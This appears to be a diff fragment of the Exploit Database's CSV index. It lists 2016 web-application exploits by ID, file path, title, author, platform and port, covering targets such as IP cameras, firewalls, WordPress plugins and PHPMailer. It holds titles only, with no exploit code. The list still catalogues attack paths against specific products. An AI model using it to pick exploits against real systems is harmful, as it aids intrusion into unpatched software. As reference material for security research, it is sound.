-40214,exploits/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80 -40215,exploits/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80 -40216,exploits/jsp/webapps/40216.txt,"Navis Webaccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000 -40218,exploits/php/webapps/40218.txt,"PHPCollab CMS 2.5 - 'emailusers.php' SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80 -40220,exploits/php/webapps/40220.txt,"WordPress Plugin Add From Server < 3.3.2 - Cross-Site Request Forgery (Arbitrary File Upload)",2016-08-08,"Edwin Molenaar",php,webapps,80 -40221,exploits/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-08-10,hyp3rlinx,php,webapps,80 -40225,exploits/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80 -40227,exploits/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80 -40228,exploits/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Code Execution",2016-08-10,LiquidWorm,php,webapps,80 -40229,exploits/jsp/webapps/40229.txt,"WebNMS Framework Server 5.2/5.2 SP1 - Multiple Vulnerabilities",2016-08-10,"Pedro Ribeiro",jsp,webapps, -40231,exploits/java/webapps/40231.txt,"ColoradoFTP 1.3 Prime Edition (Build 8) - Directory Traversal",2016-08-11,Rv3Laboratory,java,webapps,80 -40281,exploits/cgi/webapps/40281.txt,"Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps, -40236,exploits/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,ruby,webapps,80 -40262,exploits/cgi/webapps/40262.txt,"SIEMENS IP Cameras (Multiple Models) - Credential Disclosure / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80 -40237,exploits/php/webapps/40237.txt,"Zabbix 2.2.x/3.0.x - SQL Injection",2016-08-15,1n3,php,webapps, -40239,exploits/jsp/webapps/40239.txt,"WSO2 Identity Server 5.1.0 - Multiple Vulnerabilities",2016-08-16,hyp3rlinx,jsp,webapps, -40240,exploits/jsp/webapps/40240.txt,"WSO2 Carbon 4.4.5 - Local File Inclusion",2016-08-16,hyp3rlinx,jsp,webapps,9443 -40241,exploits/jsp/webapps/40241.txt,"WSO2 Carbon 4.4.5 - Persistent Cross-Site Scripting",2016-08-16,hyp3rlinx,jsp,webapps,9443 -40242,exploits/jsp/webapps/40242.txt,"WSO2 Carbon 4.4.5 - Denial of Service / Cross-Site Request Forgery",2016-08-16,hyp3rlinx,jsp,webapps,9443 -40247,exploits/php/webapps/40247.txt,"Lepton CMS 2.2.0/2.2.1 - Directory Traversal",2016-08-16,hyp3rlinx,php,webapps,80 -40248,exploits/php/webapps/40248.txt,"Lepton CMS 2.2.0/2.2.1 - PHP Code Injection",2016-08-16,hyp3rlinx,php,webapps,80 -40249,exploits/linux/webapps/40249.txt,"Pi-Hole Web Interface 2.8.1 - Persistent Cross-Site Scripting in Whitelist/Blacklist",2016-08-16,loneferret,linux,webapps, -40250,exploits/php/webapps/40250.txt,"Nagios Log Server 1.4.1 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps, -40251,exploits/php/webapps/40251.txt,"Nagios Network Analyzer 2.2.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps, -40252,exploits/php/webapps/40252.txt,"Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps, -40254,exploits/cgi/webapps/40254.txt,"SIEMENS IP-Camera CVMS2025-IR / CCMS2025 - Credentials Disclosure",2016-08-17,"Yakir Wizman",cgi,webapps,80 -40260,exploits/cgi/webapps/40260.sh,"SIEMENS IP Camera CCMW1025 x.2.2.1798 - Remote Admin Credentials Change",2016-08-18,"Todor Donev",cgi,webapps,80 -40261,exploits/cgi/webapps/40261.txt,"Honeywell IP-Camera HICC-1100PT - Credentials Disclosure",2016-08-18,"Yakir Wizman",cgi,webapps,80 -40263,exploits/cgi/webapps/40263.txt,"Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR - Credentials Disclosure",2016-08-19,"Yakir Wizman",cgi,webapps,80 -40264,exploits/cgi/webapps/40264.txt,"JVC IP-Camera VN-T216VPRU - Credentials Disclosure",2016-08-19,"Yakir Wizman",cgi,webapps,80 -40265,exploits/cgi/webapps/40265.txt,"C2S DVR Management IRDOME-II-C2S / IRBOX-II-C2S / DVR - Credentials Disclosure / Authentication Bypass",2016-08-19,"Yakir Wizman",cgi,webapps,80 -40266,exploits/cgi/webapps/40266.txt,"TOSHIBA IP-Camera IK-WP41A - Authentication Bypass / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80 -40267,exploits/cgi/webapps/40267.txt,"MESSOA IP-Camera NIC990 - Authentication Bypass / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80 -40269,exploits/cgi/webapps/40269.txt,"ZYCOO IP Phone System - Remote Command Execution",2016-08-19,0x4148,cgi,webapps, -40272,exploits/cgi/webapps/40272.txt,"TOPSEC Firewalls - 'ELIGIBLECONTESTANT' Remote Code Execution",2016-08-19,"Shadow Brokers",cgi,webapps, -40273,exploits/cgi/webapps/40273.txt,"TOPSEC Firewalls - 'ELIGIBLECANDIDATE' Remote Code Execution",2016-08-19,"Shadow Brokers",cgi,webapps, -40274,exploits/cgi/webapps/40274.txt,"TOPSEC Firewalls - 'ELIGIBLEBOMBSHELL' Remote Code Execution",2016-08-19,"Shadow Brokers",cgi,webapps, -40276,exploits/hardware/webapps/40276.txt,"Fortigate Firewalls - 'EGREGIOUSBLUNDER' Remote Code Execution",2016-08-19,"Shadow Brokers",hardware,webapps, -40277,exploits/cgi/webapps/40277.sh,"MESSOA IP Cameras (Multiple Models) - Unauthenticated Password Change",2016-08-19,"Todor Donev",cgi,webapps,80 -40278,exploits/php/webapps/40278.txt,"tcPbX - 'tcpbx_lang' Local File Inclusion",2016-08-19,0x4148,php,webapps, -40282,exploits/cgi/webapps/40282.txt,"JVC IP-Camera VN-T216VPRU - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps, -40283,exploits/cgi/webapps/40283.txt,"Honeywell IP-Camera HICC-1100PT - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps, -40284,exploits/hardware/webapps/40284.txt,"VideoIQ Camera - Local File Disclosure",2016-08-22,"Yakir Wizman",hardware,webapps, -40285,exploits/php/webapps/40285.txt,"Ocomon 2.0 - SQL Injection",2016-08-22,"Jonatas Fil",php,webapps,80 -40286,exploits/java/webapps/40286.txt,"Sakai 10.7 - Multiple Vulnerabilities",2016-08-22,LiquidWorm,java,webapps, -40288,exploits/php/webapps/40288.txt,"WordPress 4.5.3 - Directory Traversal / Denial of Service",2016-08-22,"Yorick Koster",php,webapps,80 -40290,exploits/php/webapps/40290.txt,"WordPress Plugin Mail Masta 1.0 - Local File Inclusion",2016-08-23,"Guillermo Garcia Marcos",php,webapps,80 -40292,exploits/php/webapps/40292.txt,"SimplePHPQuiz - Blind SQL Injection",2016-08-23,HaHwul,php,webapps,80 -40293,exploits/php/webapps/40293.txt,"chatNow - Multiple Vulnerabilities",2016-08-23,HaHwul,php,webapps,80 -40295,exploits/php/webapps/40295.txt,"WordPress Plugin CYSTEME Finder 1.3 - Arbitrary File Disclosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80 -40312,exploits/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,php,webapps, -40324,exploits/jsp/webapps/40324.txt,"ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials SYSTEM Remote Code Execution",2016-08-31,LiquidWorm,jsp,webapps,8088 -40325,exploits/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - Cross-Site Request Forgery (Add Superadmin)",2016-08-31,LiquidWorm,jsp,webapps,8088 -40326,exploits/jsp/webapps/40326.txt,"ZKTeco ZKBioSecurity 3.0 - Directory Traversal",2016-08-31,LiquidWorm,jsp,webapps,8088 -40327,exploits/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass",2016-08-31,LiquidWorm,jsp,webapps, -40328,exploits/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088 -40454,exploits/php/webapps/40454.txt,"Picosafe Web GUI - Multiple Vulnerabilities",2016-10-05,"Shahab Shamsi",php,webapps, -40462,exploits/cgi/webapps/40462.py,"Witbe - Remote Code Execution",2016-10-05,BeLmar,cgi,webapps, -40467,exploits/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps, -40468,exploits/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps, -40469,exploits/php/webapps/40469.txt,"MLM Unilevel Plan Script 1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps, -40470,exploits/php/webapps/40470.txt,"Just Dial Clone Script - 'fid' SQL Injection",2016-10-06,OoN_Boy,php,webapps, -40475,exploits/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)",2016-10-07,Besim,php,webapps, -40479,exploits/php/webapps/40479.txt,"Entrepreneur Job Portal Script 2.06 - SQL Injection",2016-10-07,OoN_Boy,php,webapps, -40480,exploits/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps, -40481,exploits/php/webapps/40481.txt,"ShoreTel Connect ONSITE - Blind SQL Injection",2016-09-19,"Iraklis Mathiopoulos",php,webapps, -40486,exploits/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps, -40487,exploits/php/webapps/40487.txt,"PHP Press Release - Persistent Cross-Site Scripting",2016-10-09,Besim,php,webapps, -40492,exploits/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps, -40493,exploits/php/webapps/40493.html,"Spacemarc News - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps, -40495,exploits/php/webapps/40495.html,"BirdBlog 1.4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-11,Besim,php,webapps,80 -40496,exploits/php/webapps/40496.html,"phpEnter 4.2.7 - Cross-Site Request Forgery (Add New Post)",2016-10-11,Besim,php,webapps,80 -40500,exploits/cgi/webapps/40500.py,"AVTECH IP Camera / NVR / DVR Devices - Multiple Vulnerabilities",2016-10-11,"Gergely Eberhardt",cgi,webapps,80 -40501,exploits/xml/webapps/40501.txt,"RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection",2016-10-11,"SEC Consult",xml,webapps, -40505,exploits/php/webapps/40505.txt,"ApPHP MicroBlog 1.0.2 - Persistent Cross-Site Scripting",2016-10-11,Besim,php,webapps, -40506,exploits/php/webapps/40506.html,"ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)",2016-10-11,Besim,php,webapps, -40511,exploits/php/webapps/40511.txt,"Categorizator 0.3.1 - SQL Injection",2016-10-12,Wadeek,php,webapps, -40512,exploits/php/webapps/40512.txt,"NetBilletterie 2.8 - Multiple Vulnerabilities",2016-10-12,Wadeek,php,webapps, -40516,exploits/php/webapps/40516.txt,"ApPHP MicroCMS 3.9.5 - Persistent Cross-Site Scripting",2016-10-12,Besim,php,webapps, -40513,exploits/php/webapps/40513.txt,"OpenCimetiere 3.0.0-a5 - Blind SQL Injection",2016-10-12,Wadeek,php,webapps, -40517,exploits/php/webapps/40517.html,"ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin)",2016-10-12,Besim,php,webapps, -40526,exploits/php/webapps/40526.txt,"Colorful Blog - Persistent Cross-Site Scripting",2016-10-13,Besim,php,webapps, -40527,exploits/php/webapps/40527.txt,"Colorful Blog - Cross-Site Request Forgery (Change Admin Password)",2016-10-13,Besim,php,webapps, -40529,exploits/php/webapps/40529.txt,"RSS News AutoPilot Script 1.0.1/3.1.0 - Admin Panel Authentication Bypass",2016-10-13,"Arbin Godar",php,webapps, -40530,exploits/php/webapps/40530.txt,"JonhCMS 4.5.1 - SQL Injection",2016-10-13,Besim,php,webapps, -40531,exploits/php/webapps/40531.txt,"Simple Forum PHP 2.4 - SQL Injection",2016-10-14,"Ehsan Hosseini",php,webapps, -40532,exploits/php/webapps/40532.html,"Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)",2016-10-14,"Ehsan Hosseini",php,webapps, -40534,exploits/php/webapps/40534.html,"YouTube Automated CMS 1.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-14,"Arbin Godar",php,webapps, -40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps, -40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps, -40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps, -40545,exploits/php/webapps/40545.txt,"Learning Management System 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps, -40546,exploits/php/webapps/40546.txt,"Fashion Shopping Cart 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps, -40547,exploits/php/webapps/40547.txt,"Health Record System 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps, -40552,exploits/php/webapps/40552.txt,"PHP Telephone Directory - Multiple Vulnerabilities",2016-10-16,larrycompress,php,webapps, -40553,exploits/php/webapps/40553.txt,"Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting",2016-10-17,"Ahsan Tahir",php,webapps,80 -40554,exploits/php/webapps/40554.txt,"PHP Image Database - Multiple Vulnerabilities",2016-10-16,larrycompress,php,webapps, -40555,exploits/php/webapps/40555.txt,"Simple Shopping Cart Application 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps, -40557,exploits/php/webapps/40557.html,"PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)",2016-10-16,"Meryem AKDOĞAN",php,webapps, -40558,exploits/php/webapps/40558.txt,"School Full CBT 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps, -40559,exploits/php/webapps/40559.txt,"PHP Business Directory - Multiple Vulnerabilities",2016-10-17,larrycompress,php,webapps, -40566,exploits/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",php,webapps, -40569,exploits/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,java,webapps, -40571,exploits/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80 -40576,exploits/php/webapps/40576.py,"XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-19,"Ahsan Tahir",php,webapps, -40584,exploits/php/webapps/40584.txt,"Intel(R) PROSet/Wireless WiFi Software 15.01.1000.0927 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",php,webapps, -40590,exploits/xml/webapps/40590.txt,"Oracle BI Publisher 11.1.1.6.0/11.1.1.7.0/11.1.1.9.0/12.2.1.0.0 - XML External Entity Injection",2016-10-20,"Jakub Palaczynski",xml,webapps, -40591,exploits/php/webapps/40591.txt,"Classifieds Rental Script - SQL Injection",2016-10-20,"Arbin Godar",php,webapps, -40594,exploits/php/webapps/40594.txt,"Event Calendar PHP 1.5 - SQL Injection",2016-10-20,"Ehsan Hosseini",php,webapps, -40595,exploits/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,php,webapps,80 -40596,exploits/php/webapps/40596.txt,"SPIP 3.1.1/3.1.2 - File Enumeration / Path Traversal",2016-10-20,Sysdream,php,webapps,80 -40597,exploits/php/webapps/40597.txt,"SPIP 3.1.2 - Cross-Site Request Forgery",2016-10-20,Sysdream,php,webapps,80 -40612,exploits/php/webapps/40612.txt,"Just Dial Clone Script - 'srch' SQL Injection",2016-10-21,"Arbin Godar",php,webapps, -40614,exploits/php/webapps/40614.py,"FreePBX 13 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps, -40620,exploits/php/webapps/40620.txt,"Zenbership 107 - Multiple Vulnerabilities",2016-10-23,Besim,php,webapps, -40626,exploits/hardware/webapps/40626.txt,"Orange Inventel LiveBox 5.08.3-sp - Cross-Site Request Forgery",2016-10-24,BlackMamba,hardware,webapps, -40628,exploits/php/webapps/40628.pl,"EC-CUBE 2.12.6 - Server-Side Request Forgery",2016-10-24,Wadeek,php,webapps, -40629,exploits/hardware/webapps/40629.txt,"Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management",2016-10-24,"Sniper Pex",hardware,webapps, -40631,exploits/php/webapps/40631.txt,"Boonex Dolphin 7.3.2 - Authentication Bypass",2016-10-26,"Saadi Siddiqui",php,webapps, -40642,exploits/php/webapps/40642.txt,"InfraPower PPS-02-S Q213V1 - Local File Disclosure",2016-10-28,LiquidWorm,php,webapps, -40644,exploits/php/webapps/40644.txt,"InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference",2016-10-28,LiquidWorm,php,webapps, -40645,exploits/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,php,webapps, -40641,exploits/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting Vulnerabilities",2016-10-28,LiquidWorm,php,webapps, -40646,exploits/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,php,webapps, -40640,exploits/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Command Execution",2016-10-28,LiquidWorm,hardware,webapps, -40637,exploits/php/webapps/40637.txt,"Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation",2016-10-27,"Xiphos Research Ltd",php,webapps,80 -40650,exploits/php/webapps/40650.txt,"S9Y Serendipity 2.0.4 - Cross-Site Scripting",2016-10-31,Besim,php,webapps, -40671,exploits/php/webapps/40671.txt,"School Registration and Fee System - Authentication Bypass",2016-11-01,opt1lc,php,webapps, -40682,exploits/php/webapps/40682.txt,"Alienvault OSSIM/USM 5.3.1 - PHP Object Injection",2016-11-02,"Peter Lapp",php,webapps, -40683,exploits/php/webapps/40683.txt,"Alienvault OSSIM/USM 5.3.1 - Persistent Cross-Site Scripting",2016-11-02,"Peter Lapp",php,webapps, -40684,exploits/php/webapps/40684.txt,"Alienvault OSSIM/USM 5.3.1 - SQL Injection",2016-11-02,"Peter Lapp",php,webapps, -40690,exploits/hardware/webapps/40690.txt,"LifeSize Room 5.0.9 - Multiple Vulnerabilities",2016-11-02,"Xiphos Research Ltd",hardware,webapps, -40692,exploits/php/webapps/40692.html,"SweetRice 1.5.1 - Cross-Site Request Forgery",2016-11-02,"Ashiyane Digital Security Team",php,webapps, -40698,exploits/php/webapps/40698.py,"SweetRice 1.5.1 - Arbitrary File Download",2016-11-03,"Ashiyane Digital Security Team",php,webapps, -40700,exploits/php/webapps/40700.html,"SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution",2016-11-03,"Ashiyane Digital Security Team",php,webapps, -40701,exploits/php/webapps/40701.html,"ETchat 3.7 - Cross-Site Request Forgery",2016-11-03,"Hesam Bazvand",php,webapps, -40705,exploits/php/webapps/40705.html,"sNews 1.7.1 - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps, -40706,exploits/php/webapps/40706.txt,"sNews 1.7.1 - Arbitrary File Upload",2016-11-03,Amir.ght,php,webapps, -40707,exploits/php/webapps/40707.html,"nodCMS - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps, -40708,exploits/php/webapps/40708.html,"Redaxo 5.2.0 - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps, -40719,exploits/php/webapps/40719.txt,"Schoolhos CMS 2.29 - 'kelas' SQL Injection",2016-11-07,Vulnerability-Lab,php,webapps, -40723,exploits/php/webapps/40723.txt,"NodCMS - PHP Code Execution",2016-11-07,"Ashiyane Digital Security Team",php,webapps, -40724,exploits/php/webapps/40724.txt,"Piwik 2.16.0 - 'layout' PHP Object Injection",2016-11-07,"Egidio Romano",php,webapps,80 -40725,exploits/php/webapps/40725.txt,"Sophos Web Appliance 4.2.1.3 - Remote Code Execution",2016-11-07,KoreLogic,php,webapps, -40732,exploits/php/webapps/40732.txt,"WordPress Plugin 404 to 301 2.2.8 - Persistent Cross-Site Scripting",2016-11-08,"Alyssa Milburn",php,webapps,80 -40733,exploits/php/webapps/40733.txt,"WordPress Plugin WassUp Real Time Analytics 1.9 - Persistent Cross-Site Scripting",2016-11-08,"Burak Kelebek",php,webapps,80 -40742,exploits/windows/webapps/40742.txt,"Adobe Connect 9.5.7 - Cross-Site Scripting",2016-11-09,Vulnerability-Lab,windows,webapps, -40746,exploits/php/webapps/40746.php,"e107 CMS 2.1.2 - Privilege Escalation",2016-11-09,"Kacper Szurek",php,webapps, -40749,exploits/php/webapps/40749.txt,"MyBB 1.8.6 - Cross-Site Scripting",2016-11-10,"Curesec Research Team",php,webapps,80 -40750,exploits/php/webapps/40750.txt,"4Images 1.7.13 - SQL Injection",2016-11-10,0x4148,php,webapps, -40751,exploits/php/webapps/40751.txt,"vBulletin 3.6.0 < 4.2.3 - 'ForumRunner' SQL Injection",2015-08-25,"Manish Tanwar",php,webapps, -40753,exploits/php/webapps/40753.php,"Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection",2016-11-13,0x4148,php,webapps, -40755,exploits/php/webapps/40755.html,"ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)",2016-11-13,"Saravana Kumar",php,webapps, -40756,exploits/php/webapps/40756.py,"Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution",2016-11-14,0x4148,php,webapps, -40771,exploits/php/webapps/40771.txt,"WordPress Plugin Answer My Question 1.3 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps, -40772,exploits/php/webapps/40772.txt,"WordPress Plugin Sirv 1.3.1 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps, -40782,exploits/php/webapps/40782.txt,"WordPress Plugin BBS e-Franchise 1.1.1 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps, -40783,exploits/php/webapps/40783.txt,"WordPress Plugin Product Catalog 8 1.2.0 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps, -40776,exploits/php/webapps/40776.txt,"EditMe CMS - Cross-Site Request Forgery (Add New Admin)",2016-11-18,Vulnerability-Lab,php,webapps, -40791,exploits/php/webapps/40791.txt,"ScriptCase 8.1.053 - Multiple Vulnerabilities",2016-11-20,hyp3rlinx,php,webapps, -40794,exploits/java/webapps/40794.txt,"Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal",2016-11-21,"Julien Ahrens",java,webapps, -40795,exploits/php/webapps/40795.html,"WordPress Plugin Instagram Feed 1.4.6.2 - Cross-Site Request Forgery",2016-11-21,"Sipke Mellema",php,webapps,80 -40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",python,webapps,80 -40800,exploits/php/webapps/40800.txt,"LEPTON 2.2.2 - SQL Injection",2016-11-21,"Curesec Research Team",php,webapps,80 -40801,exploits/php/webapps/40801.txt,"LEPTON 2.2.2 - Remote Code Execution",2016-11-21,"Curesec Research Team",php,webapps,80 -40802,exploits/php/webapps/40802.txt,"FUDforum 3.0.6 - Cross-Site Scripting / Cross-Site Request Forgery",2016-11-21,"Curesec Research Team",php,webapps,80 -40803,exploits/php/webapps/40803.txt,"FUDforum 3.0.6 - Local File Inclusion",2016-11-21,"Curesec Research Team",php,webapps,80 -40804,exploits/php/webapps/40804.txt,"WordPress Plugin Olimometer 2.56 - SQL Injection",2016-11-21,"TAD GROUP",php,webapps, -40809,exploits/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,php,webapps, -40816,exploits/xml/webapps/40816.txt,"SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML External Entity Injection",2016-11-22,ERPScan,xml,webapps, -40826,exploits/php/webapps/40826.py,"osTicket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",php,webapps, -40895,exploits/multiple/webapps/40895.py,"Splunk Enterprise 6.4.3 - Server-Side Request Forgery",2016-12-09,Security-Assessment.com,multiple,webapps, -40837,exploits/hardware/webapps/40837.txt,"Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting",2016-11-28,Vulnerability-Lab,hardware,webapps, -40842,exploits/java/webapps/40842.txt,"Red Hat JBoss EAP - Deserialization of Untrusted Data",2016-11-28,"Mediaservice.net Srl.",java,webapps,8080 -40850,exploits/php/webapps/40850.txt,"WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion",2016-11-30,"Lenon Leite",php,webapps, -40851,exploits/php/webapps/40851.txt,"Joomla! Component Catalog 1.0.7 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps, -40852,exploits/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps, -40853,exploits/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,hardware,webapps, -40856,exploits/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",hardware,webapps, -40877,exploits/php/webapps/40877.txt,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",php,webapps, -40887,exploits/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,hardware,webapps, -40889,exploits/cgi/webapps/40889.txt,"NETGEAR R7000 - Command Injection",2016-12-07,Acew0rm,cgi,webapps, -40898,exploits/hardware/webapps/40898.txt,"NETGEAR R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",hardware,webapps, -40901,exploits/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps, -40904,exploits/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps, -40908,exploits/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80 -40912,exploits/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' SQL Injection",2016-12-13,"Elar Lang",php,webapps,80 -40932,exploits/php/webapps/40932.txt,"WHMCompleteSolution (WHMCS) Addon VMPanel 2.7.4 - SQL Injection",2016-12-16,ZwX,php,webapps,80 -40934,exploits/php/webapps/40934.html,"WordPress Plugin Quiz And Survey Master 4.5.4/4.7.8 - Cross-Site Request Forgery",2016-12-16,dxw,php,webapps,80 -40939,exploits/php/webapps/40939.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps, -40940,exploits/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (1)",2016-12-16,"Lenon Leite",php,webapps, -40941,exploits/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps, -40942,exploits/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps, -40961,exploits/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps, -40966,exploits/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,php,webapps, -40968,exploits/php/webapps/40968.php,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",php,webapps, -40970,exploits/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution (PHP)",2016-12-25,"Dawid Golunski",php,webapps, -40969,exploits/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",php,webapps, -40971,exploits/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",php,webapps, -40972,exploits/php/webapps/40972.php,"SwiftMailer < 5.4.5-DEV - Remote Code Execution",2016-12-28,"Dawid Golunski",php,webapps, -40973,exploits/php/webapps/40973.txt,"Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection",2016-12-28,qemm,php,webapps, -40974,exploits/php/webapps/40974.py,"PHPMailer < 5.2.18 - Remote Code Execution (Python)",2016-12-29,anarc0der,php,webapps, 